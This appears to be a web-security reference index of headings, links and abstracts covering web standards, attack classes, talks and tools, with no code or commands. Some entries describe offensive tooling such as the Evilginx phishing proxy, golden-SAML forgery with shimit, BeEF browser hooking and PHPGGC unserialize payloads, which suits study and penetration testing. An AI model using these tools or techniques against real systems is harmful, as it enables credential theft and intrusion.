-
- Content Security Policy(CSP)
- Common Origin Resource Sharing (CORS)
- Document Object Model(DOM)
- HTML
- Hyper Text Transport Protocol (HTTP)
- OAUTH
- Robots.txt
- Same-Origin-Policy
- Security Assertion Markup Language (SAML)
- Service Workers
- SubResource Integrity
- Uniform Resource Identifier/Locator(URIs/URLs)
- WebAuthentication
- WebBluetooth
- Web Hooks
- WebNFC
- WebRTC
- WebSockets
- WebUSB
-
- APIs
- Browser Security
- SSL/TLS
- CMS Specific Tools
- Cold Fusion
- Continous Integration/Build Systems
- Electron
- Flash/SWF
- Javascript
- Java Server Faces
- Java Server Pages
- JSON Web Tokens
- MIME Sniffing
- NodeJS
- PASETO
- PHP
- REST & Web Services
- Ruby
- Single Sign-On
- Web Application Firewalls(WAFs)
- Web Assembly
- Web Frameworks
- Web Proxies
- Web Servers
-
- Abuse of Functionality
- Brute Force Fuzzing
- Attacking Continous Integration Systems
- ClickJacking
- Cross-Protocol Request
- Cross-Site History Manipulation (XHSM)
- Cross-Site-Request Forgery
- CSV Injection
- De/Encoders
- Data Structure Attacks
- Embedded Malicious Code
- Exploitation of Authentication
- File Upload Testing
- HTML Smuggling
- HTTP Request Smuggling
- Insecure Direct Object Reference
- Injection Based Attacks
- JNDI
- Java Serialization Attacks
- LFI & RFI
- Path Traversal Attacks
- Reflected File Download
- Server Side Request Forgery
- Server Side Include
- Server Side Template Injection
- Tabnabbing
- Timing Attacks
- Typosquatting Attacks
- Web Cache Deception
- Web Shells
- XML Related
- XSS
- 101 ASVS
- OWASP Top Ten Project
- The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.
- The Website Obesity Crisis
- Video Testing stateful web application workflows - András Veres-Szentkirályi
- Paper Testing stateful web application workflows - SANS - András Veres-Szentkirályi
- Most web applications used for complex business operations and/or employing advanced GUI frameworks have stateful functionality. Certain workflows, for example, might require completing certain steps before a transaction is committed, or a request sent by a client-side UI element might need several preceding requests that all contribute to the session state. Most automated tools focus on a request and maybe a redirection, thus completely missing the point in these cases, where resending a request gets ignored by the target application. As a result, while these tools are getting better day by day, using them for testing such execution paths are usually out of the question. Since thorough assessment is cumbersome without such tools, there's progress, but we are far from plug-and-play products. This paper focuses on the capabilities of currently available solutions, demonstrating their pros and cons, along with opportunities for improvement.
- OWASP Top Ten Project
- 101
- Articles/Papers/Talks/Writeups
- Tools
- Miscellaneous
- 101
- Cross-Origin Resource Sharing (CORS) - Mozilla Dev Docs
- CORS Findings: Another Way to Comprehend - Ryan Leese
- Same Origin Policy - dev.mozilla
- Same Origin Policy - W3C
- Cross-Origin Resource Sharing (CORS) - dev.mozilla
- Cross-Origin Resource Sharing - w3.org
- This document defines a mechanism to enable client-side cross-origin requests. Specifications that enable an API to make cross-origin requests to resources can use the algorithms defined by this specification. If such an API is used on
http://example.org
resources, a resource onhttp://hello-world.example
can opt in using the mechanism described by this specification (e.g., specifyingAccess-Control-Allow-Origin: http://example.org
as response header), which would allow that resource to be fetched cross-origin fromhttp://example.org
.
- This document defines a mechanism to enable client-side cross-origin requests. Specifications that enable an API to make cross-origin requests to resources can use the algorithms defined by this specification. If such an API is used on
- Articles/Blogposts/Writeups
- Papers/Talks/Writeups
- Exploiting CORS Misconfigurations For Bitcoins And Bounties by James Kettle
- Cross-Origin Resource Sharing (CORS) is a mechanism for relaxing the Same Origin Policy to enable communication between websites via browsers. It's already widely understood that certain CORS configurations are dangerous. In this presentation, I'll skim over the old knowledge then coax out and share with you an array of under-appreciated but dangerous subtleties and implications buried in the CORS specification. I'll illustrate each of these with recent attacks on real websites, showing how I could have used them to steal bitcoins from two different exchanges, partially bypass Google's use of HTTPS, and requisition API keys from numerous others. I'll also show how CORS blunders can provide an invaluable link in crafting exploit chains to pivot across protocols, exploit the unexploitable via server and client-side cache poisoning, and even escalate certain open redirects into vulnerabilities that are actually notable.
- Blogpost
- Exploiting CORS Misconfigurations For Bitcoins And Bounties by James Kettle
- Tools
- CORStest
- A simple CORS misconfiguration scanner
- CORStest
- Miscellaneous
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
-
- Fetch Living Standard — 2019/7/16 - whatwg
- The Fetch standard defines requests, responses, and the process that binds them: fetching.
- Fetch Living Standard — 2019/7/16 - whatwg
-
101
- RFC 2068: Hypertext Transfer Protocol -- HTTP/1.1
- RFC 2616: Hypertext Transfer Protocol -- HTTP/1.1
- http-decision-diagram
- An activity diagram to describe the resolution of HTTP response status codes, given various headers, implemented via semantical callbacks.
-
Caching
- RFC 7234: Hypertext Transfer Protocol (HTTP/1.1): Caching
- The Hypertext Transfer Protocol (HTTP) is a stateless application-level protocol for distributed, collaborative, hypertext information systems. This document defines HTTP caches and the associated header fields that control cache behavior or indicate cacheable response messages.
- RFC 7234: Hypertext Transfer Protocol (HTTP/1.1): Caching
-
HTTP Headers
-
HTTP Methods
-
HTTP Objects
-
HTTP Parameters
-
Syntax & Routing
- RFC 7230: Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing
- The Hypertext Transfer Protocol (HTTP) is a stateless application-level protocol for distributed, collaborative, hypertext information systems. This document provides an overview of HTTP architecture and its associated terminology, defines the "http" and "https" Uniform Resource Identifier (URI) schemes, defines the HTTP/1.1 message syntax and parsing requirements, and describes related security concerns for implementations.
- RFC 7230: Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing
-
101
-
Articles/Blogposts/Presentations/Talks/Writeups
- 101
- MIME Sniffing - whatwg.org
- Media Type Sniffing | draft-ietf-websec-mime-sniff-03
- Many web servers supply incorrect Content-Type header fields with their HTTP responses. In order to be compatible with these servers, user agents consider the content of HTTP responses as well as the Content-Type header fields when determining the effective media type of the response. This document describes an algorithm for determining the effective media type of HTTP responses that balances security and compatibility considerations
- Articles/Blogposts/Presentations/Talks/Writeups
- 101
- OAuth 2.0 Security Best Current Practice draft-ietf-oauth-security-topics-05 - Expires Sept19,2018
- This document describes best current security practices for OAuth 2.0.. It updates and extends the OAuth 2.0 Security Threat Model to incorporate practical experiences gathered since OAuth 2.0 was published and cover new threats relevant due to the broader application of OAuth 2.0.
- OAuth 2.0 Dynamic Client Registration Protocol - rfc7591
- This specification defines mechanisms for dynamically registering OAuth 2.0 clients with authorization servers. Registration requests send a set of desired client metadata values to the authorization server. The resulting registration responses return a client identifier to use at the authorization server and the client metadata values registered for the client. The client can then use this registration information to communicate with the authorization server using the OAuth 2.0 protocol. This specification also defines a set of common client metadata fields and values for clients to use during registration.
- The OAuth 2.0 Authorization Framework: JWT Secured Authorization Request - ietf.org
- The authorization request in OAuth 2.0 described in RFC 6749 utilizes query parameter serialization, which means that Authorization Request parameters are encoded in the URI of the request and sent through user agents such as web browsers. While it is easy to implement, it means that (a) the communication through the user agents are not integrity protected and thus the parameters can be tainted, and (b) the source of the communication is not authenticated. Because of these weaknesses, several attacks to the protocol have now been put forward. This document introduces the ability to send request parameters in a JSON Web Token (JWT) instead, which allows the request to be signed with JSON Web Signature (JWS) and encrypted with JSON Web Encryption (JWE) so that the integrity, source authentication and confidentiality property of the Authorization Request is attained. The request can be sent by value or by reference.
- OAuth 2.0 Mutual TLS Client Authentication and Certificate Bound Access Tokens - ietf
- This document describes Transport Layer Security (TLS) mutual authentication using X.509 certificates as a mechanism for OAuth client authentication to the authorization sever as well as for certificate bound sender constrained access tokens as a method for a protected resource to ensure that an access token presented to it by a given client was issued to that client by the authorization server.
- OAuth 2.0 Security Best Current Practice draft-ietf-oauth-security-topics-05 - Expires Sept19,2018
- Articles/Blogposts/Writeups
- Dancing with OAuth: Understanding how Authorization Works - Ashish Mathur
- Shining a Light on OAuth Abuse with PwnAuth - Douglas Bienstock
- OAUTH – Everything you wanted to know but not really! - Elaheh Samani, Kevin Watkins
- An Illustrated Guide to OAuth and OpenID Connect - David Neal
- Analysis of Common Federated Identity Protocols: OpenID Connect vs OAuth 2.0 vs SAML 2.0 - hackedu.io
- Presentations/Talks/Videos
- Attacking
- 101
- RFC 6454: The Web Origin Concept
- This document defines the concept of an "origin", which is often used as the scope of authority or privilege by user agents. Typically, user agents isolate content retrieved from different origins to prevent malicious web site operators from interfering with the operation of benign web sites. In addition to outlining the principles that underlie the concept of origin, this document details how to determine the origin of a URI and how to serialize an origin into a string. It also defines an HTTP header field, named "Origin", that indicates which origins are associated with an HTTP request.
- Same-origin policy - Mozilla
- The same-origin policy is a critical security mechanism that restricts how a document or script loaded from one origin can interact with a resource from another origin. It helps isolate potentially malicious documents, reducing possible attack vectors.
- Same-origin policy - Wikipedia
- Same-origin Policy - W3
- RFC 6454: The Web Origin Concept
- Articles/Blogposts/Writeups
- 101
- Articles/Blogposts/Writeups
- With Great Power Comes Great Pwnage
- Out of Band XML External Entity Injection via SAML SSO - Sean Melia
- Web-based Single Sign-On and the Dangers of SAML XML Parsing
- Following the white Rabbit Down the SAML Code
- Evilginx - Advanced Phishing with Two-factor Authentication Bypass
- SAML All the Things! A Deep Dive into SAML SSO - Elijah A. Martin-Merrill
- Golden SAML Attack
- Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps
- shimit
- In a golden SAML attack, attackers can gain access to an application (any application that supports SAML authentication) with any privileges they desire and be any user on the targeted application. shimit allows the user to create a signed SAMLResponse object, and use it to open a session in the Service Provider. shimit now supports AWS Console as a Service Provider, more are in the works...
- Tools
- Evilginx
- Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It's core runs on Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content, while intercepting traffic between client and server.
- SAMLReQuest Burpsuite Extention
- Evilginx
- 101
- Service Worker - w3c
- This specification describes a method that enables applications to take advantage of persistent background processing, including hooks to enable bootstrapping of web applications while offline. The core of this system is an event-driven Web Worker, which responds to events dispatched from documents and other sources. A system for managing installation, versions, and upgrades is provided. The service worker is a generic entry point for event-driven background processing in the Web Platform that is extensible by other specifications.
- Service Worker - w3c
- 101
- Subresource Integrity - W3.org
- Subresource Integrity - w3c.github.io
- This specification defines a mechanism by which user agents may verify that a fetched resource has been delivered without unexpected manipulation.
- Articles/Blogposts/Writeups
- Tools
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- Transport Layer Security (TLS) Extensions
- Mixed content - w3c
- This specification describes how a user agent should handle fetching of content over unencrypted or unauthenticated connections in the context of an encrypted and authenticated document.
- Attacks Against
- SSL/TLS Interception Proxies and Transitive Trust
- Secure Sockets Layer (SSL) and its successor Transport Layer Security (TLS), have become key components of the modern Internet. The privacy, integrity, and authenticity provided by these protocols are critical to allowing sensitive communications to occur. Without these systems, e-commerce, online banking, and business-to-business exchange of information would likely be far less frequent. Threat actors have also recognized the benefits of transport security, and they are increasingly turning to SSL to hide their activities. Advanced Persistent Threat (APT ) attackers, botnets, and eve n commodity web attacks can leverage SSL encryption to evade detection. To counter these tactics, organizations are increasingly deploying security controls that intercept end-to-end encrypted channels. Web proxies, data loss prevention (DLP) systems, specialized threat detection solutions, and network intrusion prevention systems (NIPS) offer functionality to intercept, inspect, and filter encrypted traffic. Similar functionality is present in lawful intercept systems and solutions enabling the broad surveillance of encrypted communications by governments. Broadly classified as “SSL/TLS interception proxies”, these solutions act as a “man-in-the-middle", violating the end-to-end security promises of SSL. This type of interception comes at a cost. Intercepting SSL-encrypted connections sacrifices a degree of privacy and integrity for the benefit of content inspection, often at the risk of authenticity and endpoint validation. Implementers and designers of SSL interception proxies should consider these risks and understand how their systems operate in unusual circumstances
- SSL/TLS Interception Proxies and Transitive Trust
- 101
- Streams - Dec12 2019
- This specification provides APIs for creating, composing, and consuming streams of data that map efficiently to low-level I/O primitives.
- Streams - Dec12 2019
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- 101
- 101
- Articles/Blogposts/Writeups
- 101
- 101
- Articles/Papers/Talks/Writeups
- General
- Tools
- Miscellaneous
- 101
- Articles/Papers/Talks/Writeups
- General
- Tools
- [WSSiP: A WebSocket Manipulation Proxy])(https://github.com/nccgroup/wssip)
- Short for "WebSocket/Socket.io Proxy", this tool, written in Node.js, provides a user interface to capture, intercept, send custom messages and view all WebSocket and Socket.IO communications between the client and server.
- [WSSiP: A WebSocket Manipulation Proxy])(https://github.com/nccgroup/wssip)
- Miscellaneous
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- WebUSB - How a website could steal data off your phone
- This blog post looks in to the capabilities of WebUSB to understand how it works, the new attack surface, and privacy issues. We will describe the processes necessary to get access to devices and how permissions are handled in the browser. Then we will discuss some security implications and shows, how a website can use WebUSB to establish an ADB connection and effectively compromise a connected Android phone.
- WebUSB - How a website could steal data off your phone
- General
- WebSocket API Standards
- White House Web API Standards
- This document provides guidelines and examples for White House Web APIs, encouraging consistency, maintainability, and best practices across applications. White House APIs aim to balance a truly RESTful API interface with a positive developer experience (DX).
- Build Simple Restful Api With Python and Flask Part 1 - Mukhammad Ginanjar Azie
- What Is OpenAPI?
- The OpenAPI Specification
- The OpenAPI Specification (OAS) defines a standard, programming language-agnostic interface description for REST APIs, which allows both humans and computers to discover and understand the capabilities of a service without requiring access to source code, additional documentation, or inspection of network traffic. When properly defined via OpenAPI, a consumer can understand and interact with the remote service with a minimal amount of implementation logic. Similar to what interface descriptions have done for lower-level programming, the OpenAPI Specification removes guesswork in calling a service.
- The OpenAPI Specification
- The OpenAPI Specification is a community-driven open specification within the OpenAPI Initiative, a Linux Foundation Collaborative Project. The OpenAPI Specification (OAS) defines a standard, programming language-agnostic interface description for REST APIs, which allows both humans and computers to discover and understand the capabilities of a service without requiring access to source code, additional documentation, or inspection of network traffic. When properly defined via OpenAPI, a consumer can understand and interact with the remote service with a minimal amount of implementation logic. Similar to what interface descriptions have done for lower-level programming, the OpenAPI Specification removes guesswork in calling a service.
- Fuzzing
- Fuzzapi
- Fuzzapi is rails application which uses API_Fuzzer and provide UI solution for gem.
- Automating API Penetration Testing using fuzzapi - AppSecUSA 2016
- Fuzzapi
- Building One
- Securing
- OWASP API Security Project
- OWASP API Security Top 10
- API Security Checklist
- Checklist of the most important security countermeasures when designing, testing, and releasing your API
- Tools
- Postman - chrome plugin
- restclient - Firefox addon
- Astra
- REST API penetration testing is complex due to continuous changes in existing APIs and newly added APIs. Astra can be used by security engineers or developers as an integral part of their process, so they can detect and patch vulnerabilities early during development cycle. Astra can automatically detect and test login & logout (Authentication API), so it's easy for anyone to integrate this into CICD pipeline. Astra can take API collection as an input so this can also be used for testing apis in standalone mode.
- API-fuzzer
- API Fuzzer which allows to fuzz request attributes using common pentesting techniques and lists vulnerabilities
- 101
- Articles/Blogposts/Writeups
- Papers
- Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control
- Abstract: Since the early days of Netscape, browser vendors and web security researchers have restricted out-going data based on its destination. The security argument accompanying these mechanisms is that they prevent sensitive user data from being sent to the attacker’s domain. However, in this paper, we show that regulating web information flow based on its destination server is an inherently flawed security practice. It is vulnerable to self-exfiltration attacks, where an adversary stashes stolen information in the database of a whitelisted site, then later independently connects to the whitelisted site to retrieve the information. We describe eight existing browser security mechanisms that are vulnerable to these “self-exfiltration” attacks. Furthermore, we discovered at least one exfiltration channel for each of the Alexa top 100 websites. None of the existing information flow control mechanisms we surveyed are sufficient to protect data from being leaked to the attacker. Our goal is to prevent browser vendors and researchers from falling into this trap by designing more systems that are vulnerable to self-exfiltration.
- How do we Stop Spilling the Beans Across Origins? - A primer on web attacks via cross-origin information leaks and speculative execution - [email protected], [email protected]
- Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control
- Presentations/Talks/Videos
- Browser as Botnet - Brannon Dorsey - Radical Networks 2017
- When surfing the web, browsers download and execute arbitrary JavaScript code they receive from websites they visit. What if high-traffic websites served obfuscated code that secretly borrowed clock cycles from their client’s web browser as a means of distributed computing? In this talk I present research on the topic of using web browsers as zero-configuration, trojan-less botnets. The presentation includes a brief history of botnets, followed by an overview of techniques to build and deploy command-and-control botnet clients that run in-browser.
- Browser as Botnet - Brannon Dorsey - Radical Networks 2017
- Tools
- Chrome Specific
- Chromium Sandbox
- Sandbox leverages the OS-provided security to allow code execution that cannot make persistent changes to the computer or access information that is confidential. The architecture and exact assurances that the sandbox provides are dependent on the operating system. This document covers the Windows implementation as well as the general design.
- Chromium Cross-Origin Read Blocking (CORB)
- Chromium Sidechannel Threat Model: Post-Spectre Threat Model Re-Think(2018)
- Security analysis of
<portal>
element - Michal Bentkowski
- Chromium Sandbox
- Firefox Specific
- Safari Specific
- Browser Extensions
- Articles/Blogposts/Writeups
- Attacking Browser Extensions
- Botnet in the Browser: Understanding Threats Caused by Malicious Browser Extensions
- An in-depth look into Malicious Browser Extensions(2014)
- Game of Chromes: Owning the Web with Zombie Chrome Extensions - DEF CON 25 - Tomer Cohen
- Chrome-botnet
- Malware in the browser: how you might get hacked by a Chrome extension(2016) - Maxime Kjaer
- I Sold a Chrome Extension but it was a bad decision - Amit Agarwal
- Detecting Installed Extensions (Edge)(2017) - brokenbrowser.com
- Finding Browser Extensions To Hunt Evil!(2016) - Brad Antoniewicz
- Sparse Bruteforce Addon Detection(2011) - James Kettle
- Intro to Chrome addons hacking: fingerprinting(2012) - kotowicz
- No Place Like Chrome - xorrior
- Talks & Presentations
- Chrome Specific
- Firefox Specific
- Papers
- Malicious Browser Extensions at Scale: Bridging the Observability Gap between Web Site and Browser - Louis F. DeKoven, Stefan Savage, Geoffrey M. Voelker, Nektarios Leontiadis
- We present a methodology whereby users exhibiting suspicious online behaviors are scanned (with permission) to identify the set of extensions in their browser, and those extensions are in turn labelled based on the threat indicators they contain. We have employed this methodology at Facebook for six weeks, identifying more than 1700 lexically distinct malicious extensions. We use this labelling to drive user device clean-up efforts as well to report to antimalware and browser vendors.
- Paper
- Malicious Browser Extensions at Scale: Bridging the Observability Gap between Web Site and Browser - Louis F. DeKoven, Stefan Savage, Geoffrey M. Voelker, Nektarios Leontiadis
- Tools
- extension_finder
- Python and PowerShell utilities for finding installed browser extensions, plug-ins and add-ons
- CSS Keylogger
- Chrome extension and Express server that exploits keylogging abilities of CSS.
- extension_finder
- Articles/Blogposts/Writeups
- Exploiting
- Smashing The Browser: From Vulnerability Discovery To Exploit
- Goes from introducing a fuzzer to producing an IE11 0day
- The Birth of a Complete IE11 Exploit Under the New Exploit Mitigations
- BeEF Browser Exploitation Framework
- BeEF
- Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
- Browsers Gone Wild - Angelo Prado & Xiaoran Wang - BHAsia2015
- In this talk, we will demonstrate and unveil the latest developments on browser specific weaknesses including creative new mechanisms to compromise confidentiality, successfully perform login and history detection, serve mixed content, deliver malicious ghost binaries without a C&C server, exploit cache/timing side channels to extract secrets from third-party domains, and leverage new HTML5 features to carry out more stealthy attacks. This is a practical presentation with live demos that will challenge your knowledge of the Same Origin Policy and push the limits of what is possible with today's web clients.
- Smashing The Browser: From Vulnerability Discovery To Exploit
- General
- Abusing Certificate Transparency Or How To Hack Web Applications BEfore Installation - Hanno Bock
- The Spy in the Sandbox – Practical Cache Attacks in Javascript
- We present the first micro-architectural side-channel attack which runs entirely in the browser. In contrast to other works in this genre, this attack does not require the attacker to install any software on the victim’s machine to facilitate the attack, the victim needs only to browse to an untrusted webpage with attacker-controlled content. This makes the attack model highly scalable and extremely relevant and practical to today’s web, especially since most desktop browsers currently accessing the In- ternet are vulnerable to this attack. Our attack, which is an extension of the last-level cache attacks of Yarom et al., allows a remote adversary recover information belonging to other processes, other users and even other virtual machines running on the same physical host as the victim web browser. We describe the fundamentals behind our attack, evaluate its performance using a high bandwidth covert channel and finally use it to construct a system-wide mouse/network activity logger. Defending against this attack is possible, but the required counter- measures can exact an impractical cost on other benign uses of the web browser and of the computer.
- Tools
- CTFR
- Do you miss AXFR technique? This tool allows to get the subdomains from a HTTPS website in a few seconds. How it works? CTFR does not use neither dictionary attack nor brute-force, it just abuses of Certificate Transparency logs.
- Certificate Transparency Subdomains
- An hourly updated list of subdomains gathered from certificate transparency logs. https://github.com/SSLMate/certspotter https://github.com/AnikHasibul/crtscan https://github.com/chris408/ct-exposer
- CTFR
- Drupal
- Drupal Security Checklist
- Drupal Attack Scripts
- Set of brute force scripts and Checklist
- Droopescan
- A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.
- Uncovering Drupalgeddon 2 - Checkpoint
- Joomla
- Highly Effective Joomla Backdoor with Small Profile
- JoomScan
- Joomla! is probably the most widely-used CMS out there due to its flexibility, user-friendlinesss, extensibility to name a few.So, watching its vulnerabilities and adding such vulnerabilities as KB to Joomla scanner takes ongoing activity.It will help web developers and web masters to help identify possible security weaknesses on their deployed Joomla! sites. No web security scanner is dedicated only one CMS.
- JScanner
- Analyze target Joomla! installation using several different techniques.
- JoomlaVS
- JoomlaVS is a Ruby application that can help automate assessing how vulnerable a Joomla installation is to exploitation. It supports basic finger printing and can scan for vulnerabilities in components, modules and templates as well as vulnerabilities that exist within Joomla itself.
- Sharepoint
- Sparty - Sharepoint/Frontpage Auditing Tool
- Sparty is an open source tool written in python to audit web applications using sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.
- Sparty - Sharepoint/Frontpage Auditing Tool
- Wordpress
- Hacking Jenkins Servers With No Password
- Hacking Jenkins - Ideas - Zeroknock
- pwn_jenkins
- Notes about attacking Jenkins servers
- Hacking Jenkins Part 1 - Play with Dynamic Routing - Orange
- Articles
- From Markdown to RCE in Atom
- As It Stands - Electron Security - 2016
- As It Stands - Update on Electorn Security - 2016
- Modern Alchemy: Turning XSS into RCE
- Build cross platform desktop XSS, it’s easier than you think by Yosuke Hasegawa - CodeBlue16
- Modern Alchemy: Turning XSS into RCE - doyensec
- From Markdown to RCE in Atom - statuscode.ch
- Instrumenting Electron Apps for Security Testing - Paolo Stagno
- Documentation
- Papers
- Talks & Presentations
- MarkDoom: How I Hacked Every Major IDE in 2 Weeks - Matt Austin, LevelUp 2017
- Electron - Build cross platform desktop XSS, it’s easier than you think by Yosuke Hasegawa - [CB16]
- Electronegativity - A Study of Electron Security - Carettoni
- Electron Security Checklist - A guide for developers and auditors - Luca Carettoni
- Published Exploits
- Tools
- electron-run-shell-example
- An HTML5 stand alone app using GitHub Electron (Chrome engine + Node.js) -- this is a GUI wrapper example that runs and process output of a bash shell command.
- electron-run-shell-example
- Articles/Blogposts/Writeups
- Testing for Cross-Site-Flashing - OWASP
- Security Domains, Application Domains, and More in ActionScript 3.0
- The old is new, again. CVE-2011-2461 is back!
- As a part of an ongoing investigation on Adobe Flash SOP bypass techniques, we identified a vulnerability affecting old releases of the Adobe Flex SDK compiler. Further investigation traced the issue back to a well known vulnerability (CVE20112461), already patched by Adobe. Old vulnerability, let's move on? Not this time. CVE20112461 is a very interesting bug. As long as the SWF file was compiled with a vulnerable Flex SDK, attackers can still use this vulnerability against the latest web browsers and Flash plugin. Even with the most recent updates, vulnerable Flex applications hosted on your domain can be exploited. In this presentation, we will disclose the details of this vulnerability (Adobe has never released all technicalities) and we will discuss how we conducted a large scale analysis on popular websites, resulting in the identification of numerous Alexa Top 50 sites vulnerable to this bug. Finally, we will also release a custom tool and a Burp plugin capable of detecting vulnerable SWF applications.
- Advanced Flash Vulnerabilities in Youtube Writeups Series
- Decode Adobe Flex AMF protocol
- Finding XSS vulnerabilities in flash files.
- XSS and CSRF via SWF Applets (SWFUpload, Plupload)
- WordPress Flash XSS in flashmediaelement.swf - cure53
- WordPress Flash XSS in flashmediaelement.swf - cure53
- Security Domains, Application Domains, and More in ActionScript 3.0 - senocular
- Testing for Cross site flashing (OTG-CLIENT-008) - OWASP
- XSS and CSRF via SWF Applets (SWFUpload, Plupload) - Neal Poole
- Getting started with AMF Flash Application Penetration Testing ! - nerdint
- Securing
- HardenFlash
- Patching Flash binary to stop Flash exploits and zero-days
- HardenFlash
- Tools
- General
- 101
- Articles/Blogposts/Writeups
- Reverse-Engineering
- Tools
- JSFuck
- JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
- JSDetox
- JSDetox is a tool to support the manual analysis of malicious Javascript code.
- Dom Flow - Untangling The DOM For More Easy-Juicy Bugs - BH USA 2015
- Javascript Deobfuscator - kahusecurity
- Revelo - kahusecurity
- pwn.js
- A Javascript library for browser exploitation
- Retire.js
- There is a plethora of JavaScript libraries for use on the web and in node.js apps out there. This greatly simplifies, but we need to stay update on security fixes. "Using Components with Known Vulnerabilities" is now a part of the OWASP Top 10 and insecure libraries can pose a huge risk for your webapp. The goal of Retire.js is to help you detect use of version with known vulnerabilities.
- JSFuck
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- 101
- Articles/Blogposts/Writeups
- Presentations/Talks/Videos
- Testing
- Tools
- json token decode
- JWT Inspector - FF plugin
- JWT Inspector is a browser extension that lets you decode and inspect JSON Web Tokens in requests, cookies, and local storage. Also debug any JWT directly from the console or in the built-in UI.
- c-jwt-cracker
- JWT4B
- JSON Web Tokens (JWT) support for the Burp Interception Proxy. JWT4B will let you manipulate a JWT on the fly, automate common attacks against JWT and decode it for you in the proxy history. JWT4B automagically detects JWTs in the form of 'Authorization Bearer' headers as well as customizable post body parameters.
- Writeups
- How to configure Json.NET to create a vulnerable web API - alphabot
- 🔐 Learn how to use JSON Web Token (JWT) to secure your next Web App! (Tutorial/Example with Tests!!)
- Critical vulnerabilities in JSON Web Token libraries
- Brute Forcing HS256 is Possible: The Importance of Using Strong Keys in Signing JWTs
- Hacking JSON Web Token (JWT) - Hate_401
- [JWT (JSON Web Token) (in)security - Michal Sadjak]
- Practical Approaches for Testing and Breaking JWT Authentication - Mazin Ahmed
- 101
- What is MIME Sniffing? - keycdn.com
- Content Sniffing - Wikipedia
- Content sniffing, also known as media type sniffing or MIME sniffing, is the practice of inspecting the content of a byte stream to attempt to deduce the file format of the data within it.
- Articles/Blogposts/Writeups
- Exploitation of
- 101
- Educational
- A Roadmap for Node.js Security
- NodeGoat
- Being lightweight, fast, and scalable, Node.js is becoming a widely adopted platform for developing web applications. This project provides an environment to learn how OWASP Top 10 security risks apply to web applications developed using Node.js and how to effectively address them.
- Articles/Blogposts/Writeups
- Presentations/Talks/Videos
- Tools
- faker.js
- generate massive amounts of fake data in Node.js and the browser
- faker.js
- 101
- Articles/Blogposts/Writeups
- 101
- Articles/Blogposts/Writeups
- Pwning PHP mail() function For Fun And RCE | New Exploitation Techniques And Vectors
- The unexpected dangers of preg_replace
- Imagecreatefromgif-Bypass
- A simple helper script to find byte sequences present in both of 2 given files. The main purpose of this is to find bytes that remain untouched after being processed with imagecreatefromgif() PHP function from GD-LIB. That is the place where a malicious PHP script can be inserted to achieve some nasty RCE.
- Is PHP vulnerable and under what conditions?
- Code Reuse
- 101
- Articles/Blogposts/Writeups
- Crypto
- 101
- Articles/Blogposts/Writeups
- I Forgot Your Password: Randomness Attacks Against PHP Applications - George Argyros, Aggelos Kiayia
- We provide a number of practical techniques and algorithms for exploiting randomness vulnerabilities in PHP applications.We focus on the predictability of password reset tokens and demonstrate how an attacker can take over user accounts in a web application via predicting or algorithmically derandomizing the PHP core randomness generators. While our techniques are designed for the PHP language, the principles behind our techniques and our algorithms are independent of PHP and can readily apply to any system that utilizes weak randomness generators or low entropy sources. Our results include: algorithms that reduce the entropy of time variables, identifying and exploiting vulnera- bilities of the PHP system that enable the recovery or reconstruction of PRNG seeds, an experimental analysis of the Hastad-Shamir framework for breaking truncated linear variables, an optimized online Gaussian solver for large sparse linear systems, and an algorithm for recovering the state of the Mersenne twister generator from any level of truncation. We demonstrate the gravity of our attacks via a number of case studies. Specifically, we show that a number of current widely used web applications can be broken using our tech- niques including Mediawiki, Joomla, Gallery, osCommerce and others.
- I Forgot Your Password: Randomness Attacks Against PHP Applications - George Argyros, Aggelos Kiayia
- De/Serialization
- 101
- Articles/Blogposts/Writeups
- Writing Exploits For Exotic Bug Classes: unserialize()
- Remote code execution via PHP [Unserialize] - notsosecure
- PHP Generic Gadget Chains: Exploiting unserialize in unknown environments
- PHPGGC: PHP Generic Gadget Chains
- PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically. When encountering an unserialize on a website you don't have the code of, or simply when trying to build an exploit, this tool allows you to generate the payload without having to go through the tedious steps of finding gadgets and combining them. Currently, the tool supports: Doctrine, Guzzle, Laravel, Monolog, Slim, SwiftMailer.
- File Operation Induced Unserialization via the "phar://" Stream Wrapper - secarma labs
- Pictures
- Hacking with Pictures - Syscan2015
- Exploiting PHP-GD imagecreatefromjpeg() function - fakhrizulkifli
- Proof-of-concept to exploit the flaw in the PHP-GD built-in function, imagecreatefromjpeg(). Inspired by one of Reddit's comment on my previous thread regarding exploiting the imagecreatefromgif() PHP-GD function.
- Property-Oriented Programming(POP)
- Code Reuse Attacks in PHP: Automated POP Chain Generation
